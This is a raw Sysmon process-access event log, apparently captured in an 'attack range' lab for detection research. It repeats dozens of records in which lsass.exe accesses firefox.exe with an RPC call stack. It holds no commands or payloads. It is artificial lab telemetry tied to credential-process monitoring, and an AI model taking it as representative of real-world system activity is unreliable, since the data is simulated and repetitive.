12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042425Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042424Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042423Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042422Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042421Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042420Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042419Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042418Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042417Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042416Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042415Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042414Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042413Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042412Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042411Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042410Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042409Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042408Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042407Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042406Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042405Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042404Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.778{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042403Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 